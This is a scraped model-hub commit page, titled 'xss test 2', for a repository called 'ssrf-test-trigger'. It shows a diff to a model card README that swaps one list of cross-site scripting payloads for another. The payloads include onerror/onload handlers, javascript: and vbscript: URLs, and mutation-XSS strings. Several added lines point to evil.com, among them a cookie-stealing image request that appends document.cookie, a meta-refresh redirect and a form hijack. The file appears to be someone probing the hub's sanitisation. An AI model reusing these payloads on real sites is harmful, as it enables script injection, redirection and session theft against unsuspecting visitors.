asdasdasadsdas
/

ssrf-test-trigger

Model card Files Files and versions

asdasdasadsdas commited on 14 days ago

Commit

5385b77

·

verified ·

1 Parent(s): 55fa762

xss test 2

Files changed (1) hide show

README.md +32 -10

README.md CHANGED Viewed

@@ -2,20 +2,42 @@
 license: mit
 ---
-# Test Model
-<img src=x onerror=alert(document.domain)>
-<svg onload=alert(1)>
-[click me](javascript:alert(1))
-<iframe src="javascript:alert(1)">
-<details open ontoggle=alert(1)>
-<summary>test</summary>
-</details>
-<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src=x onerror=alert(1)>">
-<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)">click</a>

 license: mit
 ---
+<a href="data:text/html,<script>alert(1)</script>">data url</a>
+<a href="vbscript:alert(1)">vbscript</a>
+<form action="https://evil.com"><button>submit</button></form>
+<base href="https://evil.com">
+<link rel="stylesheet" href="https://evil.com/steal.css">
+<style>@import url('https://evil.com/steal.css');</style>
+<meta http-equiv="refresh" content="0;url=https://evil.com">
+<object data="https://evil.com/evil.swf"></object>
+<embed src="https://evil.com/evil.swf">
+<video><source onerror="alert(1)"></video>
+<body onload="alert(1)">
+<marquee onstart=alert(1)>xss</marquee>
+<input onfocus=alert(1) autofocus>
+<select autofocus onfocus=alert(1)>
+<keygen autofocus onfocus=alert(1)>
+<video autoplay onloadstart=alert(1)><source src="x"></video>
+<audio autoplay onloadstart=alert(1)><source src="x"></audio>
+<img src="https://evil.com/log?cookie="+document.cookie>
+<svg><use xlink:href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x"/></svg>
+<math><annotation-xml encoding="text/html"><img src=x onerror=alert(1)></annotation-xml></math>